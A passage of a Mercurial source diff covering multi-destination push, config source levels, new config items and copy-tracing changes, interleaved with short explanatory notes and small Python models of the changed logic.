-def push(ui, repo, dest=None, **opts):
+def push(ui, repo, *dests, **opts):
"""push changes to the specified destination
Push changesets from the local repository to the specified
@@ -5522,6 +5666,9 @@
Please see :hg:`help urls` for important details about ``ssh://``
URLs. If DESTINATION is omitted, a default path will be used.
+ When passed multiple destinations, push will process them one after the
+ other, but stop should an error occur.
+
.. container:: verbose
The --pushvars option sends strings to the server that become
@@ -5566,75 +5713,89 @@
# this lets simultaneous -r, -b options continue working
opts.setdefault(b'rev', []).append(b"null")
- path = ui.paths.getpath(dest, default=(b'default-push', b'default'))
- if not path:
- raise error.ConfigError(
- _(b'default repository not configured!'),
- hint=_(b"see 'hg help config.paths'"),
- )
- dest = path.pushloc or path.loc
- branches = (path.branch, opts.get(b'branch') or [])
- ui.status(_(b'pushing to %s\n') % util.hidepassword(dest))
- revs, checkout = hg.addbranchrevs(repo, repo, branches, opts.get(b'rev'))
- other = hg.peer(repo, opts, dest)
-
- if revs:
- revs = [repo[r].node() for r in scmutil.revrange(repo, revs)]
- if not revs:
- raise error.InputError(
- _(b"specified revisions evaluate to an empty set"),
- hint=_(b"use different revision arguments"),
- )
- elif path.pushrev:
- # It doesn't make any sense to specify ancestor revisions. So limit
- # to DAG heads to make discovery simpler.
- expr = revsetlang.formatspec(b'heads(%r)', path.pushrev)
- revs = scmutil.revrange(repo, [expr])
- revs = [repo[rev].node() for rev in revs]
- if not revs:
- raise error.InputError(
- _(b'default push revset for path evaluates to an empty set')
- )
- elif ui.configbool(b'commands', b'push.require-revs'):
- raise error.InputError(
- _(b'no revisions specified to push'),
- hint=_(b'did you mean "hg push -r ."?'),
+ some_pushed = False
+ result = 0
+ for path in urlutil.get_push_paths(repo, ui, dests):
+ dest = path.pushloc or path.loc
+ branches = (path.branch, opts.get(b'branch') or [])
+ ui.status(_(b'pushing to %s\n') % urlutil.hidepassword(dest))
+ revs, checkout = hg.addbranchrevs(
+ repo, repo, branches, opts.get(b'rev')
)
-
- repo._subtoppath = dest
- try:
- # push subrepos depth-first for coherent ordering
- c = repo[b'.']
- subs = c.substate # only repos that are committed
- for s in sorted(subs):
- result = c.sub(s).push(opts)
- if result == 0:
- return not result
- finally:
- del repo._subtoppath
-
- opargs = dict(opts.get(b'opargs', {})) # copy opargs since we may mutate it
- opargs.setdefault(b'pushvars', []).extend(opts.get(b'pushvars', []))
-
- pushop = exchange.push(
- repo,
- other,
- opts.get(b'force'),
- revs=revs,
- newbranch=opts.get(b'new_branch'),
- bookmarks=opts.get(b'bookmark', ()),
- publish=opts.get(b'publish'),
- opargs=opargs,
- )
-
- result = not pushop.cgresult
-
- if pushop.bkresult is not None:
- if pushop.bkresult == 2:
- result = 2
- elif not result and pushop.bkresult:
- result = 2
-
+ other = hg.peer(repo, opts, dest)
+
+ try:
+ if revs:
+ revs = [repo[r].node() for r in scmutil.revrange(repo, revs)]
+ if not revs:
+ raise error.InputError(
+ _(b"specified revisions evaluate to an empty set"),
+ hint=_(b"use different revision arguments"),
+ )
+ elif path.pushrev:
+ # It doesn't make any sense to specify ancestor revisions. So limit
+ # to DAG heads to make discovery simpler.
+ expr = revsetlang.formatspec(b'heads(%r)', path.pushrev)
+ revs = scmutil.revrange(repo, [expr])
+ revs = [repo[rev].node() for rev in revs]
+ if not revs:
+ raise error.InputError(
+ _(
+ b'default push revset for path evaluates to an empty set'
+ )
+ )
+ elif ui.configbool(b'commands', b'push.require-revs'):
+ raise error.InputError(
+ _(b'no revisions specified to push'),
+ hint=_(b'did you mean "hg push -r ."?'),
+ )
+
+ repo._subtoppath = dest
+ try:
+ # push subrepos depth-first for coherent ordering
+ c = repo[b'.']
+ subs = c.substate # only repos that are committed
+ for s in sorted(subs):
+ sub_result = c.sub(s).push(opts)
+ if sub_result == 0:
+ return 1
+ finally:
+ del repo._subtoppath
+
+ opargs = dict(
+ opts.get(b'opargs', {})
+ ) # copy opargs since we may mutate it
+ opargs.setdefault(b'pushvars', []).extend(opts.get(b'pushvars', []))
+
+ pushop = exchange.push(
+ repo,
+ other,
+ opts.get(b'force'),
+ revs=revs,
+ newbranch=opts.get(b'new_branch'),
+ bookmarks=opts.get(b'bookmark', ()),
+ publish=opts.get(b'publish'),
+ opargs=opargs,
+ )
+
+ if pushop.cgresult == 0:
+ result = 1
+ elif pushop.cgresult is not None:
+ some_pushed = True
+
+ if pushop.bkresult is not None:
+ if pushop.bkresult == 2:
+ result = 2
+ elif not result and pushop.bkresult:
+ result = 2
+
+ if result:
+ break
+
+ finally:
+ other.close()
+ if result == 0 and not some_pushed:
+ result = 1
return result
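Across multiple destinations the exit status aggregates as follows: a failed push (cgresult 0) sets a non-zero result and stops the loop, and pushing nothing anywhere also yields 1. A condensed model of just the changegroup part (bookmark results omitted; push_one is hypothetical and returns a pushop.cgresult-like value):

    def push_all(dests, push_one):
        result, some_pushed = 0, False
        for dest in dests:
            cgresult = push_one(dest)
            if cgresult == 0:
                result = 1          # this push failed
            elif cgresult is not None:
                some_pushed = True  # changesets were actually sent
            if result:
                break               # stop at the first failure
        if result == 0 and not some_pushed:
            result = 1              # nothing pushed anywhere
        return result

    assert push_all(['x'], lambda d: 3) == 0     # pushed something
    assert push_all(['x'], lambda d: None) == 1  # no changes found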
@@ -5740,6 +5901,7 @@
@command(
b'rename|move|mv',
[
+ (b'', b'forget', None, _(b'unmark a destination file as renamed')),
(b'A', b'after', None, _(b'record a rename that has already occurred')),
(
b'',
@@ -5771,8 +5933,13 @@
exist in the working directory. If invoked with -A/--after, the
operation is recorded, but no copying is performed.
- This command takes effect at the next commit. To undo a rename
- before that, see :hg:`revert`.
+ To undo marking a destination file as renamed, use --forget. With that
+ option, all given (positional) arguments are unmarked as renames. The
+ destination file(s) will be left in place (still tracked). The source
+ file(s) will not be restored. Note that :hg:`rename --forget` behaves
+ the same way as :hg:`copy --forget`.
+
+ This command takes effect with the next commit by default.
Returns 0 on success, 1 if errors are encountered.
"""
@@ -6083,7 +6250,7 @@
if hint:
ui.warn(hint)
- unresolvedf = list(ms.unresolved())
+ unresolvedf = ms.unresolvedcount()
if not unresolvedf:
ui.status(_(b'(no more unresolved files)\n'))
cmdutil.checkafterresolved(repo)
@@ -7043,7 +7210,12 @@
return
def getincoming():
- source, branches = hg.parseurl(ui.expandpath(b'default'))
+ # XXX We should actually skip this if no default is specified, instead
+ # of passing "default" which will resolve as "./default/" if no default
+ # path is defined.
+ source, branches = urlutil.get_unique_pull_path(
+ b'summary', repo, ui, b'default'
+ )
sbranch = branches[0]
try:
other = hg.peer(repo, {}, source)
@@ -7054,7 +7226,7 @@
revs, checkout = hg.addbranchrevs(repo, other, branches, None)
if revs:
revs = [other.lookup(rev) for rev in revs]
- ui.debug(b'comparing with %s\n' % util.hidepassword(source))
+ ui.debug(b'comparing with %s\n' % urlutil.hidepassword(source))
repo.ui.pushbuffer()
commoninc = discovery.findcommonincoming(repo, other, heads=revs)
repo.ui.popbuffer()
@@ -7066,9 +7238,22 @@
source = sbranch = sother = commoninc = incoming = None
def getoutgoing():
- dest, branches = hg.parseurl(ui.expandpath(b'default-push', b'default'))
- dbranch = branches[0]
- revs, checkout = hg.addbranchrevs(repo, repo, branches, None)
+ # XXX We should actually skip this if no default is specified, instead
+ # of passing "default" which will resolve as "./default/" if no default
+ # path is defined.
+ d = None
+ if b'default-push' in ui.paths:
+ d = b'default-push'
+ elif b'default' in ui.paths:
+ d = b'default'
+ if d is not None:
+ path = urlutil.get_unique_push_path(b'summary', repo, ui, d)
+ dest = path.pushloc or path.loc
+ dbranch = path.branch
+ else:
+ dest = b'default'
+ dbranch = None
+ revs, checkout = hg.addbranchrevs(repo, repo, (dbranch, []), None)
if source != dest:
try:
dother = hg.peer(repo, {}, dest)
@@ -7076,7 +7261,7 @@
if opts.get(b'remote'):
raise
return dest, dbranch, None, None
- ui.debug(b'comparing with %s\n' % util.hidepassword(dest))
+ ui.debug(b'comparing with %s\n' % urlutil.hidepassword(dest))
elif sother is None:
# there is no explicit destination peer, but source one is invalid
return dest, dbranch, None, None
@@ -7101,6 +7286,12 @@
dest = dbranch = dother = outgoing = None
if opts.get(b'remote'):
+ # Help pytype. --remote sets both `needsincoming` and `needsoutgoing`.
+ # The former always sets `sother` (or raises an exception if it can't);
+ # the latter always sets `outgoing`.
+ assert sother is not None
+ assert outgoing is not None
+
t = []
if incoming:
t.append(_(b'1 or more incoming'))
@@ -7412,7 +7603,7 @@
try:
txnname = b'unbundle'
if not isinstance(gen, bundle2.unbundle20):
- txnname = b'unbundle\n%s' % util.hidepassword(url)
+ txnname = b'unbundle\n%s' % urlutil.hidepassword(url)
with repo.transaction(txnname) as tr:
op = bundle2.applybundle(
repo, gen, tr, source=b'unbundle', url=url
@@ -7428,7 +7619,10 @@
)
modheads = bundle2.combinechangegroupresults(op)
- return postincoming(ui, repo, modheads, opts.get('update'), None, None)
+ if postincoming(ui, repo, modheads, opts.get('update'), None, None):
+ return 1
+ else:
+ return 0
@command(
@@ -7708,7 +7902,7 @@
)
license = _(
b"(see https://mercurial-scm.org for more information)\n"
- b"\nCopyright (C) 2005-2021 Matt Mackall and others\n"
+ b"\nCopyright (C) 2005-2021 Olivia Mackall and others\n"
b"This is free software; see the source for copying conditions. "
b"There is NO\nwarranty; "
b"not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n"
--- a/mercurial/commandserver.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/commandserver.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# commandserver.py - communicate with Mercurial's API over a pipe
#
-# Copyright Matt Mackall <mpm@selenic.com>
+# Copyright Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/commit.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/commit.py Tue Apr 20 11:01:06 2021 -0400
@@ -96,6 +96,10 @@
ctx.date(),
extra,
)
+ rev = repo[n].rev()
+ if oldtip != repo.changelog.tiprev():
+ repo.register_changeset(rev, repo.changelog.changelogrevision(rev))
+
xp1, xp2 = p1.hex(), p2 and p2.hex() or b''
repo.hook(
b'pretxncommit',
@@ -108,7 +112,7 @@
targetphase = subrepoutil.newcommitphase(repo.ui, ctx)
# prevent unmarking changesets as public on recommit
- waspublic = oldtip == repo.changelog.tiprev() and not repo[n].phase()
+ waspublic = oldtip == repo.changelog.tiprev() and not repo[rev].phase()
if targetphase and not waspublic:
# retract boundary do not alter parent changeset.
@@ -116,7 +120,7 @@
# be compliant anyway
#
# if minimal phase was 0 we don't need to retract anything
- phases.registernew(repo, tr, targetphase, [repo[n].rev()])
+ phases.registernew(repo, tr, targetphase, [rev])
return n
@@ -357,6 +361,8 @@
elif fparent2 != nullid:
if ms.active() and ms.extras(fname).get(b'filenode-source') == b'other':
fparent1, fparent2 = fparent2, nullid
+ elif ms.active() and ms.extras(fname).get(b'merged') != b'yes':
+ fparent1, fparent2 = fparent1, nullid
# is one parent an ancestor of the other?
else:
fparentancestors = flog.commonancestorsheads(fparent1, fparent2)
--- a/mercurial/config.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/config.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# config.py - configuration parsing for Mercurial
#
-# Copyright 2009 Matt Mackall <mpm@selenic.com> and others
+# Copyright 2009 Olivia Mackall <olivia@selenic.com> and others
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -22,14 +22,19 @@
class config(object):
def __init__(self, data=None):
+ self._current_source_level = 0
self._data = {}
self._unset = []
if data:
for k in data._data:
self._data[k] = data[k].copy()
- self._source = data._source.copy()
- else:
- self._source = util.cowdict()
+ self._current_source_level = data._current_source_level + 1
+
+ def new_source(self):
+ """increment the source counter
+
+ This is used to define source priority when reading."""
+ self._current_source_level += 1
def copy(self):
return config(self)
@@ -48,45 +53,66 @@
yield d
def update(self, src):
- self._source = self._source.preparewrite()
+ current_level = self._current_source_level
+ current_level += 1
+ max_level = self._current_source_level
for s, n in src._unset:
ds = self._data.get(s, None)
if ds is not None and n in ds:
self._data[s] = ds.preparewrite()
del self._data[s][n]
- del self._source[(s, n)]
for s in src:
ds = self._data.get(s, None)
if ds:
self._data[s] = ds.preparewrite()
else:
self._data[s] = util.cowsortdict()
- self._data[s].update(src._data[s])
- self._source.update(src._source)
+ for k, v in src._data[s].items():
+ value, source, level = v
+ level += current_level
+ max_level = max(level, current_level)
+ self._data[s][k] = (value, source, level)
+ self._current_source_level = max_level
+
+ def _get(self, section, item):
+ return self._data.get(section, {}).get(item)
def get(self, section, item, default=None):
- return self._data.get(section, {}).get(item, default)
+ result = self._get(section, item)
+ if result is None:
+ return default
+ return result[0]
- def backup(self, section, item):
+ def backup(self, section, key):
"""return a tuple allowing restore to reinstall a previous value
The main reason we need it is because it handles the "no data" case.
"""
try:
- value = self._data[section][item]
- source = self.source(section, item)
- return (section, item, value, source)
+ item = self._data[section][key]
except KeyError:
- return (section, item)
+ return (section, key)
+ else:
+ return (section, key) + item
def source(self, section, item):
- return self._source.get((section, item), b"")
+ result = self._get(section, item)
+ if result is None:
+ return b""
+ return result[1]
+
+ def level(self, section, item):
+ result = self._get(section, item)
+ if result is None:
+ return None
+ return result[2]
def sections(self):
return sorted(self._data.keys())
def items(self, section):
- return list(pycompat.iteritems(self._data.get(section, {})))
+ items = pycompat.iteritems(self._data.get(section, {}))
+ return [(k, v[0]) for (k, v) in items]
def set(self, section, item, value, source=b""):
if pycompat.ispy3:
@@ -103,26 +129,31 @@
self._data[section] = util.cowsortdict()
else:
self._data[section] = self._data[section].preparewrite()
- self._data[section][item] = value
- if source:
- self._source = self._source.preparewrite()
- self._source[(section, item)] = source
+ self._data[section][item] = (value, source, self._current_source_level)
+
+ def alter(self, section, key, new_value):
+ """alter a value without altering its source or level
+
+ This method is meant to be used by `ui.fixconfig` only."""
+ item = self._data[section][key]
+ size = len(item)
+ new_item = (new_value,) + item[1:]
+ assert len(new_item) == size
+ self._data[section][key] = new_item
def restore(self, data):
"""restore data returned by self.backup"""
- self._source = self._source.preparewrite()
- if len(data) == 4:
+ if len(data) != 2:
# restore old data
- section, item, value, source = data
+ section, key = data[:2]
+ item = data[2:]
self._data[section] = self._data[section].preparewrite()
- self._data[section][item] = value
- self._source[(section, item)] = source
+ self._data[section][key] = item
else:
# no data before, remove everything
section, item = data
if section in self._data:
self._data[section].pop(item, None)
- self._source.pop((section, item), None)
def parse(self, src, data, sections=None, remap=None, include=None):
sectionre = util.re.compile(br'\[([^\[]+)\]')
@@ -206,6 +237,7 @@
raise error.ConfigError(message, (b"%s:%d" % (src, line)))
def read(self, path, fp=None, sections=None, remap=None):
+ self.new_source()
if not fp:
fp = util.posixfile(path, b'rb')
assert (
@@ -220,6 +252,8 @@
def include(rel, remap, sections):
abs = os.path.normpath(os.path.join(dir, rel))
self.read(abs, remap=remap, sections=sections)
+ # anything after the include has a higher level
+ self.new_source()
self.parse(
path, fp.read(), sections=sections, remap=remap, include=include
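The net effect of this change is that every item now carries a monotonically increasing source level, and update() re-bases incoming levels above everything already present, so later-read configuration wins. A compact standalone model of that bookkeeping (class and method names hypothetical):

    class MiniConfig:
        # item -> (value, source, level); a higher level was read later
        def __init__(self):
            self.level = 0
            self.data = {}

        def new_source(self):
            self.level += 1

        def set(self, key, value, source=''):
            self.data[key] = (value, source, self.level)

        def update(self, other):
            # entries from `other` land above everything already present
            base = self.level + 1
            for key, (value, source, level) in other.data.items():
                self.data[key] = (value, source, base + level)
            self.level = base + other.level

    system, user = MiniConfig(), MiniConfig()
    system.set('ui.editor', 'vi', '/etc/mercurial/hgrc')
    user.set('ui.editor', 'emacs', '~/.hgrc')
    system.update(user)            # user config was read later, so it wins
    assert system.data['ui.editor'][0] == 'emacs'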
--- a/mercurial/configitems.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/configitems.py Tue Apr 20 11:01:06 2021 -0400
@@ -570,11 +570,21 @@
default=0,
)
coreconfigitem(
+ b'convert',
+ b'svn.dangerous-set-commit-dates',
+ default=False,
+)
+coreconfigitem(
b'debug',
b'dirstate.delaywrite',
default=0,
)
coreconfigitem(
+ b'debug',
+ b'revlog.verifyposition.changelog',
+ default=b'',
+)
+coreconfigitem(
b'defaults',
b'.*',
default=None,
@@ -610,6 +620,12 @@
b'check-relroot',
default=False,
)
+# Track copy information for all files, not just "added" ones (very slow)
+coreconfigitem(
+ b'devel',
+ b'copy-tracing.trace-all-files',
+ default=False,
+)
coreconfigitem(
b'devel',
b'default-date',
@@ -689,6 +705,11 @@
)
coreconfigitem(
b'devel',
+ b'copy-tracing.multi-thread',
+ default=True,
+)
+coreconfigitem(
+ b'devel',
b'debug.extensions',
default=False,
)
@@ -716,6 +737,14 @@
b'discovery.grow-sample',
default=True,
)
+# When discovery.grow-sample.dynamic is True, the default, the sample size is
+# adapted to the shape of the undecided set (it is set to the max of:
+# <target-size>, len(roots(undecided)), len(heads(undecided)))
+coreconfigitem(
+ b'devel',
+ b'discovery.grow-sample.dynamic',
+ default=True,
+)
# discovery.grow-sample.rate control the rate at which the sample grow
coreconfigitem(
b'devel',
@@ -729,8 +758,26 @@
b'discovery.randomize',
default=True,
)
+# Control the initial size of the discovery sample
+coreconfigitem(
+ b'devel',
+ b'discovery.sample-size',
+ default=200,
+)
+# Control the sample size used in the first discovery round
+coreconfigitem(
+ b'devel',
+ b'discovery.sample-size.initial',
+ default=100,
+)
_registerdiffopts(section=b'diff')
coreconfigitem(
+ b'diff',
+ b'merge',
+ default=False,
+ experimental=True,
+)
+coreconfigitem(
b'email',
b'bcc',
default=None,
@@ -827,6 +874,31 @@
)
coreconfigitem(
b'experimental',
+ b'bundlecompthreads',
+ default=None,
+)
+coreconfigitem(
+ b'experimental',
+ b'bundlecompthreads.bzip2',
+ default=None,
+)
+coreconfigitem(
+ b'experimental',
+ b'bundlecompthreads.gzip',
+ default=None,
+)
+coreconfigitem(
+ b'experimental',
+ b'bundlecompthreads.none',
+ default=None,
+)
+coreconfigitem(
+ b'experimental',
+ b'bundlecompthreads.zstd',
+ default=None,
+)
+coreconfigitem(
+ b'experimental',
b'changegroup3',
default=False,
)
@@ -1235,7 +1307,7 @@
coreconfigitem(
b'format',
b'revlog-compression',
- default=lambda: [b'zlib'],
+ default=lambda: [b'zstd', b'zlib'],
alias=[(b'experimental', b'format.compression')],
)
coreconfigitem(
@@ -1253,10 +1325,36 @@
b'usestore',
default=True,
)
+
+
+def _persistent_nodemap_default():
+ """compute `use-persistent-nodemap` default value
+
+ The feature is disabled unless a fast implementation is available.
+ """
+ from . import policy
+
+ return policy.importrust('revlog') is not None
+
+
coreconfigitem(
b'format',
b'use-persistent-nodemap',
+ default=_persistent_nodemap_default,
+)
+# TODO needs to grow a docket file to at least store the last offset of the data
+# file when rewriting sidedata.
+# Will also need a way of dealing with garbage data if we allow rewriting
+# *existing* sidedata.
+# Exchange-wise, we will also need to do something more efficient than keeping
+# references to the affected revlogs, especially memory-wise when rewriting
+# sidedata.
+# Also... compress the sidedata? (this should be coming very soon)
+coreconfigitem(
+ b'format',
+ b'exp-revlogv2.2',
default=False,
+ experimental=True,
)
coreconfigitem(
b'format',
--- a/mercurial/context.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/context.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# context.py - changeset and file context objects for mercurial
#
-# Copyright 2006, 2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2006, 2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -2599,6 +2599,7 @@
b'flags': flags,
b'copied': copied,
}
+ util.clearcachedproperty(self, b'_manifest')
def filectx(self, path, filelog=None):
return overlayworkingfilectx(
@@ -2884,7 +2885,7 @@
# "1 < len(self._parents)" can't be used for checking
# existence of the 2nd parent, because "memctx._parents" is
# explicitly initialized by the list, of which length is 2.
- if p2.node() != nullid:
+ if p2.rev() != nullrev:
man2 = p2.manifest()
managing = lambda f: f in man1 or f in man2
else:
@@ -2902,7 +2903,7 @@
return scmutil.status(modified, added, removed, [], [], [], [])
def parents(self):
- if self._parents[1].node() == nullid:
+ if self._parents[1].rev() == nullrev:
return [self._parents[0]]
return self._parents
@@ -2999,7 +3000,7 @@
parents = [repo[p] for p in parents if p is not None]
parents = parents[:]
while len(parents) < 2:
- parents.append(repo[nullid])
+ parents.append(repo[nullrev])
p1, p2 = self._parents = parents
# sanity check to ensure that the reused manifest parents are
@@ -3051,7 +3052,7 @@
# "1 < len(self._parents)" can't be used for checking
# existence of the 2nd parent, because "metadataonlyctx._parents" is
# explicitly initialized by the list, of which length is 2.
- if p2.node() != nullid:
+ if p2.rev() != nullrev:
man2 = p2.manifest()
managing = lambda f: f in man1 or f in man2
else:
--- a/mercurial/copies.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/copies.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,7 +1,7 @@
# coding: utf8
# copies.py - copy detection for Mercurial
#
-# Copyright 2008 Matt Mackall <mpm@selenic.com>
+# Copyright 2008 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -59,14 +59,13 @@
# Cases 1, 3, and 5 are then removed by _filter().
for k, v in list(t.items()):
- # remove copies from files that didn't exist
- if v not in src:
+ if k == v: # case 3
del t[k]
- # remove criss-crossed copies
- elif k in src and v in dst:
+ elif v not in src: # case 5
+ # remove copies from files that didn't exist
del t[k]
- # remove copies to files that were then removed
- elif k not in dst:
+ elif k not in dst: # case 1
+ # remove copies to files that were then removed
del t[k]
@@ -150,16 +149,24 @@
# optimization, since the ctx.files() for a merge commit is not correct for
# this comparison.
forwardmissingmatch = match
- if b.p1() == a and b.p2().node() == nullid:
+ if b.p1() == a and b.p2().rev() == nullrev:
filesmatcher = matchmod.exact(b.files())
forwardmissingmatch = matchmod.intersectmatchers(match, filesmatcher)
- missing = _computeforwardmissing(a, b, match=forwardmissingmatch)
+ if repo.ui.configbool(b'devel', b'copy-tracing.trace-all-files'):
+ missing = list(b.walk(match))
+ if debug:
+ dbg(b'debug.copies: searching all files: %d\n' % len(missing))
+ else:
+ missing = _computeforwardmissing(a, b, match=forwardmissingmatch)
+ if debug:
+ dbg(
+ b'debug.copies: missing files to search: %d\n'
+ % len(missing)
+ )
ancestrycontext = a._repo.changelog.ancestors([b.rev()], inclusive=True)
- if debug:
- dbg(b'debug.copies: missing files to search: %d\n' % len(missing))
-
for f in sorted(missing):
if debug:
dbg(b'debug.copies: tracing file: %s\n' % f)
@@ -267,6 +274,7 @@
revs = cl.findmissingrevs(common=[a.rev()], heads=[b.rev()])
roots = set()
has_graph_roots = False
+ multi_thread = repo.ui.configbool(b'devel', b'copy-tracing.multi-thread')
# iterate over `only(B, A)`
for r in revs:
@@ -314,7 +322,13 @@
children_count[p] += 1
revinfo = _revinfo_getter(repo, match)
return _combine_changeset_copies(
- revs, children_count, b.rev(), revinfo, match, isancestor
+ revs,
+ children_count,
+ b.rev(),
+ revinfo,
+ match,
+ isancestor,
+ multi_thread,
)
else:
# When not using side-data, we will process the edges "from" the parent.
@@ -339,7 +353,7 @@
def _combine_changeset_copies(
- revs, children_count, targetrev, revinfo, match, isancestor
+ revs, children_count, targetrev, revinfo, match, isancestor, multi_thread
):
"""combine the copies information for each item of iterrevs
@@ -356,7 +370,7 @@
if rustmod is not None:
final_copies = rustmod.combine_changeset_copies(
- list(revs), children_count, targetrev, revinfo, isancestor
+ list(revs), children_count, targetrev, revinfo, multi_thread
)
else:
isancestor = cached_is_ancestor(isancestor)
@@ -427,7 +441,11 @@
# potential filelog related behavior.
assert parent == 2
current_copies = _merge_copies_dict(
- newcopies, current_copies, isancestor, changes
+ newcopies,
+ current_copies,
+ isancestor,
+ changes,
+ current_rev,
)
all_copies[current_rev] = current_copies
@@ -449,7 +467,7 @@
PICK_EITHER = 2
-def _merge_copies_dict(minor, major, isancestor, changes):
+def _merge_copies_dict(minor, major, isancestor, changes, current_merge):
"""merge two copies-mapping together, minor and major
In case of conflict, value from "major" will be picked.
@@ -467,39 +485,75 @@
if other is None:
minor[dest] = value
else:
- pick = _compare_values(changes, isancestor, dest, other, value)
- if pick == PICK_MAJOR:
+ pick, overwrite = _compare_values(
+ changes, isancestor, dest, other, value
+ )
+ if overwrite:
+ if pick == PICK_MAJOR:
+ minor[dest] = (current_merge, value[1])
+ else:
+ minor[dest] = (current_merge, other[1])
+ elif pick == PICK_MAJOR:
minor[dest] = value
return minor
def _compare_values(changes, isancestor, dest, minor, major):
- """compare two value within a _merge_copies_dict loop iteration"""
+ """compare two value within a _merge_copies_dict loop iteration
+
+ return (pick, overwrite).
+
+ - pick is one of PICK_MINOR, PICK_MAJOR or PICK_EITHER
+ - overwrite is True if the pick resolves an ambiguity and the chosen value must overwrite the other.
+ """
major_tt, major_value = major
minor_tt, minor_value = minor
- # evacuate some simple case first:
if major_tt == minor_tt:
# if it comes from the same revision it must be the same value
assert major_value == minor_value
- return PICK_EITHER
- elif major[1] == minor[1]:
- return PICK_EITHER
-
- # actual merging needed: content from "major" wins, unless it is older than
- # the branch point or there is a merge
- elif changes is not None and major[1] is None and dest in changes.salvaged:
- return PICK_MINOR
- elif changes is not None and minor[1] is None and dest in changes.salvaged:
- return PICK_MAJOR
- elif changes is not None and dest in changes.merged:
- return PICK_MAJOR
- elif not isancestor(major_tt, minor_tt):
- if major[1] is not None:
- return PICK_MAJOR
- elif isancestor(minor_tt, major_tt):
- return PICK_MAJOR
- return PICK_MINOR
+ return PICK_EITHER, False
+ elif (
+ changes is not None
+ and minor_value is not None
+ and major_value is None
+ and dest in changes.salvaged
+ ):
+ # In this case, a deletion was reverted, the "alive" value overwrites
+ # the deleted one.
+ return PICK_MINOR, True
+ elif (
+ changes is not None
+ and major_value is not None
+ and minor_value is None
+ and dest in changes.salvaged
+ ):
+ # In this case, a deletion was reverted, the "alive" value overwrites
+ # the deleted one.
+ return PICK_MAJOR, True
+ elif isancestor(minor_tt, major_tt):
+ if changes is not None and dest in changes.merged:
+ # change to dest happened on the branch without copy-source change,
+ # so both sources are valid and "major" wins.
+ return PICK_MAJOR, True
+ else:
+ return PICK_MAJOR, False
+ elif isancestor(major_tt, minor_tt):
+ if changes is not None and dest in changes.merged:
+ # change to dest happened on the branch without copy-source change,
+ # so both sources are valid and "major" wins.
+ return PICK_MAJOR, True
+ else:
+ return PICK_MINOR, False
+ elif minor_value is None:
+ # in case of conflict, the "alive" side wins.
+ return PICK_MAJOR, True
+ elif major_value is None:
+ # in case of conflict, the "alive" side wins.
+ return PICK_MINOR, True
+ else:
+ # in case of conflict where both side are alive, major wins.
+ return PICK_MAJOR, True
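Two concrete cases of the (pick, overwrite) contract, using a trimmed-down stand-in for the function above (the changes.salvaged/changes.merged branches are omitted; values are (revision, copy-source) pairs and a None copy source means the file was deleted):

    PICK_MINOR, PICK_MAJOR, PICK_EITHER = 0, 1, 2

    def compare(minor, major, isancestor, merged=False):
        (minor_tt, minor_v), (major_tt, major_v) = minor, major
        if minor_tt == major_tt:
            return PICK_EITHER, False
        if isancestor(minor_tt, major_tt):
            # "major" descends from "minor": it wins; a merge of `dest`
            # turns the choice into an overwrite
            return PICK_MAJOR, merged
        if isancestor(major_tt, minor_tt):
            return (PICK_MAJOR, True) if merged else (PICK_MINOR, False)
        if minor_v is None:
            return PICK_MAJOR, True   # the "alive" side wins the conflict
        if major_v is None:
            return PICK_MINOR, True
        return PICK_MAJOR, True       # both alive: major wins, overwriting

    isancestor = lambda a, b: (a, b) == (1, 2)  # toy DAG: 1 is ancestor of 2
    assert compare((1, b'old'), (2, b'new'), isancestor) == (PICK_MAJOR, False)
    assert compare((2, b'x'), (3, None), isancestor) == (PICK_MINOR, True)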
def _revinfo_getter_extra(repo):
@@ -650,22 +704,28 @@
def _backwardrenames(a, b, match):
+ """find renames from a to b"""
if a._repo.ui.config(b'experimental', b'copytrace') == b'off':
return {}
+ # We don't want to pass in "match" here, since that would filter
+ # the destination by it. Since we're reversing the copies, we want
+ # to filter the source instead.
+ copies = _forwardcopies(b, a)
+ return _reverse_renames(copies, a, match)
+
+
+def _reverse_renames(copies, dst, match):
+ """given copies to context 'dst', finds renames from that context"""
# Even though we're not taking copies into account, 1:n rename situations
# can still exist (e.g. hg cp a b; hg mv a c). In those cases we
# arbitrarily pick one of the renames.
- # We don't want to pass in "match" here, since that would filter
- # the destination by it. Since we're reversing the copies, we want
- # to filter the source instead.
- f = _forwardcopies(b, a)
r = {}
- for k, v in sorted(pycompat.iteritems(f)):
+ for k, v in sorted(pycompat.iteritems(copies)):
if match and not match(v):
continue
# remove copies
- if v in a:
+ if v in dst:
continue
r[v] = k
return r
@@ -701,9 +761,17 @@
base = None
if a.rev() != nullrev:
base = x
+ x_copies = _forwardcopies(a, x)
+ y_copies = _forwardcopies(a, y, base, match=match)
+ same_keys = set(x_copies) & set(y_copies)
+ for k in same_keys:
+ if x_copies.get(k) == y_copies.get(k):
+ del x_copies[k]
+ del y_copies[k]
+ x_backward_renames = _reverse_renames(x_copies, x, match)
copies = _chain(
- _backwardrenames(x, a, match=match),
- _forwardcopies(a, y, base, match=match),
+ x_backward_renames,
+ y_copies,
)
_filter(x, y, copies)
return copies
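The cancellation of identical copies on both sides can be seen with plain dicts: a copy that x and y both inherited from the common base says nothing about renames between x and y, so it is dropped before reversing the x side:

    x_copies = {'b': 'a', 'c': 'a'}  # copies from base a to x
    y_copies = {'b': 'a'}            # copies from base a to y
    for k in set(x_copies) & set(y_copies):
        if x_copies[k] == y_copies[k]:
            # identical on both sides: not a rename between x and y
            del x_copies[k]
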